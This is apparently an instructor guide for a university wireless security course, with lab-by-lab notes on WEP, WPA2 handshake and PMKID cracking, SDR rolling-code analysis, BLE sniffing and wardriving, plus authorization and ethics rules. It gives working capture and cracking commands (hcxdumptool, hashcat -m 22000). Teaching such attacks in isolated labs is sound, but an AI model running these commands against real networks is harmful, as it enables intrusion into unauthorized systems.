WIR-101 Wireless Security — Instructor Guide

Course Philosophy

WIR-101 treats wireless as a physical-layer attack surface, not just a protocol stack. Students who finish this course can reason about RF propagation, modulation schemes, and hardware constraints, not just run Aircrack scripts. The capstone requires them to build a working RF communication channel from scratch using GNU Radio and an SDR platform, which forces engagement with signal math rather than tool-wrapping.

The course runs in two interleaved tracks:

• Wi-Fi / authentication attack track (Weeks 1-7): protocol-centric, builds on NET-101 + SEC-101 knowledge
• RF / SDR track (Weeks 8-11 + capstone): signal-centric, requires the Lyons DSP and PySDR readings

Students who come in strong on networking often struggle in Weeks 8-9 when the emphasis shifts to signal math. Budget additional office hours in that stretch.

Lab Environment Requirements

Network Infrastructure

The in-lab wireless network MUST be air-gapped from production infrastructure. Configure a dedicated wireless router for lab use:

Lab AP: SSID = "VCA-WIR101-LAB"
Security: WPA2-PSK (for attack labs) or WPA3-SAE (for Week 6 comparison)
Channel: Fixed (e.g., 6 for 2.4 GHz, 36 for 5 GHz)
DHCP scope: 192.168.200.0/24
Uplink: None (isolated)

Instructor connects a second "target" AP for deauthentication and PMKID labs. Label it clearly: "AUTHORIZED LAB TARGET ONLY."

Never allow live internet-connected APs in the monitor-mode lab area. Students' Alfa NICs will capture all traffic in range.

Sub-GHz Lab Equipment

Rolling-code demo device: The instructor must build this before the course begins. Use a microcontroller (Arduino Uno or ESP32) with a simple seed-based PRNG that outputs a 32-bit rolling code via a 433 MHz ASK transmitter module. Do NOT use a real garage door opener remote or a real vehicle key fob as a lab target. Those are consumer devices under real-world deployment; Rolljam against them is a CFAA violation outside an explicitly authorized pentest scope.

Faraday Cage Policy

Any active RF transmission during Labs 8-11 and the capstone MUST occur inside the provided Faraday cage. Verify attenuation before each lab session:

# From outside cage with RTL-SDR: note baseline RSSI at 433 MHz
# Insert transmitter, close cage, repeat scan
# Acceptable: >= 40 dB attenuation
rtl_power -f 433000000:433500000:10000 -g 40 -1 baseline.csv

Remote students are exempt (virtual path; no live TX).

Grading Rubrics

Lab Rubric (each lab, 100 points base)

Authorization discipline is a hard gate: any unauthorized capture or transmission results in a 0 for the lab and triggers an ethics incident review (see below). No partial credit.

Weekly Homework Rubric (45-min reading + 60-min hands-on)

Capstone Rubric

See CAPSTONE.md for the full 5-day rubric. Summary weights:

• Technical execution: 40% (RF signal quality, protocol correctness, attack chain completeness)
• Report craft: 30% (findings format, CVSS scoring, remediation specificity)
• Engagement discipline: 30% (authorization chain, Faraday compliance, scope adherence)
• Binary gates: pass/fail prerequisites that block grading if not met

Lab-by-Lab Notes

Lab 1 — RF Fundamentals + Spectrum Survey

Common issue: Students plug in RTL-SDR v4 without blacklisting the dvb_usb_rtl28xxu kernel module. GQRX fails to open the device. Pre-provision all student machines with the blacklist before class. Verify with rtl_test -t.

Point students at FM broadcast stations (88-108 MHz) for first-contact success before moving to 2.4 GHz ISM band survey. The psychological payoff of tuning in a radio station anchors their confidence before abstract spectrum analysis begins.

Lab 2 — 802.11 Monitor Mode + Frame Dissection

Confirm each student's Alfa NIC supports monitor mode before class. Run iw phy phy0 info | grep monitor to verify. Some batches of the AWUS036ACM ship with firmware that needs an update for 5 GHz monitor mode.

In the Wireshark dissection exercise, filter for wlan.fc.type_subtype == 0x08 (Beacon frames) first. Students get overwhelmed by raw 802.11 traffic; beacon-first focus gives them a readable starting point.

Lab 3 — WEP Crack

WEP-capable routers are increasingly hard to source. Recommend maintaining 1-2 older Linksys WRT54G units (NVRAM-flashable with DD-WRT to enable WEP). The lab can also run against a WEP-configured virtual AP on the instructor machine using hostapd.

The PRISM IQ capture format confuses students coming from Ethernet Wireshark experience. Spend 10 minutes on the radiotap header before the capture exercise.

Lab 4 — WPA2-PSK 4-Way Handshake Capture + Crack

This lab requires the "authorized target" AP. Double-check that no production APs are within capture range. The airodump-ng sweep will show them; students must be briefed not to capture from or deauth production networks.

Hashcat GPU modes: if students do not have a discrete GPU, --device cpu works but is slow. Provide a wordlist bounded to ~50k entries for class time (full rockyou.txt takes too long on CPU). The hcxdumptool PMKID variant (Lab 5) is better for demonstrating offline attack speed.

Lab 5 — PMKID Attack

Emphasize: PMKID does not require a connected client. This is the pedagogically important differentiator from the 4-way handshake. Draw the association-request sequence on the whiteboard before students run hcxdumptool.

hcxdumptool --enable_status=1 -i wlan0mon -o out.pcapng: the --enable_status flag produces console feedback; without it students think the tool is stalled.

For hashcat: hcxpcapngtool -o hash.22000 out.pcapng then hashcat -m 22000 hash.22000 wordlist.txt. The old -m 2500 mode is deprecated and will not run in hashcat 6.x+.

Lab 6 — Midterm (no lab file)

Written + practical midterm covering Weeks 1-5 material. Practical portion: students capture a WPA2 4-way handshake from the authorized lab AP, extract the hash, and run a dictionary attack. Provide the correct passphrase in the wordlist to ensure the crack succeeds within class time.

Lab 7 — WPA3-SAE

Students need a WPA3-capable AP (802.11ax / Wi-Fi 6 or newer) and WPA3-capable client adapters. The Alfa AWUS036ACM does support WPA3-SAE in managed mode. WPA3-SAE monitor-mode capture is trickier than WPA2 because the SAE commit-confirm frames are shorter and the key exchange happens without a 4-way handshake in the traditional sense.

Demo the Dragonblood (2019) timing attack conceptually. Do not attempt live exploitation; it requires custom patched drivers and is outside the lab scope. The conceptual demonstration using CVE-2019-9494 / CVE-2019-9496 writeups is sufficient.

Lab 8 — Sub-GHz Spectrum + ISM Band Mapping

First RTL-SDR lab for most students. The smoke-test from SETUP.md should have verified basic operation. Common failure: center frequency set to 433.92 MHz but USB bandwidth insufficient to capture the full sub-GHz spread. Use rtl_power for wide-band surveys rather than GQRX waterfall.

Have students scan for local ISM activity: 315 MHz (US automotive), 433 MHz (EU automotive + sensors), 868 MHz (EU LoRa), 915 MHz (US LoRa). In most classroom environments students will find wireless temperature sensors, remote power outlets, and possibly garage door remotes operating in these bands.

Lab 9 — SDR RX + IQ Analysis / PSK 3-Way / Rolling-Code

This is the most complex lab in the course. Split into three sequential exercises:

Exercise A (all students): IQ capture and demodulation using a pre-recorded .sigmf capture of a sub-GHz ASK transmission. Students demodulate, threshold, and decode the bitstream in Python. No hardware required; uses the virtual path files.

Exercise B (in-lab students with ANTSDR or HackRF access): Build a BPSK TX/RX chain in GNU Radio. Transmit inside the Faraday cage. The "3-way handshake" is demonstrated as: TX sends "SYN" in BPSK (binary 0x01), RX demodulates and replies "SYN-ACK" (0x03), TX replies "ACK" (0x02). This is a toy protocol over BPSK, not TCP -- the pedagogical point is that handshakes can operate at the physical layer, not above it.

Exercise C (in-lab students): Rolling-code recording and analysis against the instructor demo device. Students record two consecutive codes with rtl_fm or URH, observe the counter increment, and explain why replaying the first code fails after the second has been accepted by the receiver. Rolljam is demonstrated by the instructor using the demo device; students do not perform the attack themselves (it requires precise timing).

Budget 3 hours for this lab.

Lab 10 — BLE Sniffing + GATT Enumeration

Requires nRF52840 dongle (Sniffle firmware) or the LimeSDR. Most students do not own the nRF52840 dongle; have two or three available for lab rotation. The virtual path uses pre-captured .pcap files from a known BLE device.

gatttool is deprecated; steer students toward bluetoothctl + gatt-browser or the Python bleak library instead.

Lab 11 — Wi-Fi Wardriving + Report

Students use Kismet in wardriving mode (passive; no injection). Configure Kismet to log to .kismet + .pcap + KML. Students drive (or walk) a defined route and produce a findings report mapping detected SSIDs, encryption types, channel distribution, and vendor breakdown.

Scope constraint: Students must stay within the approved survey area defined by the instructor. Typically: on-campus property or a pre-defined walking circuit. Do NOT authorize suburban neighborhoods or commercial areas where consent is ambiguous.

Ethics Incident Protocol

If a student is observed or reported to have:

• Captured traffic from a network they do not own or have written authorization to test
• Transmitted RF energy outside the Faraday cage or outside Part 15 limits
• Used lab techniques against production equipment or real consumer devices

Take the following steps immediately:

1. Stop the student's lab session. Collect their lab machine or request they power down their SDR hardware.
2. Document the incident. Time, observed action, witnesses, hardware involved.
3. Do not destroy evidence. Preserve any capture files, GNU Radio flowgraphs, or terminal output.
4. Escalate to the program director. The program director determines whether the incident rises to institutional, civil, or criminal reporting thresholds.
5. Student receives a 0 for the lab. Repeat incidents result in removal from the course.

The authorization discipline grading category exists specifically to make ethics a first-class evaluation criterion, not an afterthought.

Virtual Path Student Logistics

Remote students need:

• All lab capture files distributed in advance (SigMF bundles, PCAP files, hashcat hash files)
• Clear versioning: each capture file has a SHA256 checksum in the lab instructions
• Expected output section in each lab (what the correct analysis result looks like)
• Instructor availability during lab hours for virtual students (same window as in-lab)

The virtual path does not support the transmit-side exercises in Lab 9 (PSK TX or Rolljam demonstration). For remote students, these exercises are replaced by:

• Annotated video of the instructor performing the exercise against the demo device
• Post-analysis write-up: "given the following recorded sequence, explain what the attacker would observe and why the replay fails"

Virtual path students can complete the capstone using pre-provided RF captures and software-only PSK demonstration mode (GNU Radio File Source → demodulation chain → re-encode → File Sink, no live TX).

Supplement Candidates

The following topics were cut from the v0.1 pilot for scope reasons. Consider adding in v0.2:

1. LoRa/LoRaWAN security (chirp spread spectrum; ADR exploit; join-accept replay): strong industrial IoT angle, good for students targeting OT/ICS environments
2. Zigbee packet capture (CC2531 sniffer; Z-Stack; frame key extraction): complements BLE week; sub-$30 hardware
3. IMSI catchers / IMSI paging (LTE stingray concept; IMSI privacy in 5G; srsRAN in demo mode): high student interest, high regulatory sensitivity -- requires careful framing
4. NFC/RFID cloning (Proxmark3; HID/MIFARE; ACR122U): relevant for physical security assessments; could slot in as an advanced Lab 8 variant
5. Drone RF fingerprinting (DroneID; remote ID; 2.4/5.8 GHz telemetry sniffing): emerging attack surface with no comparable curriculum coverage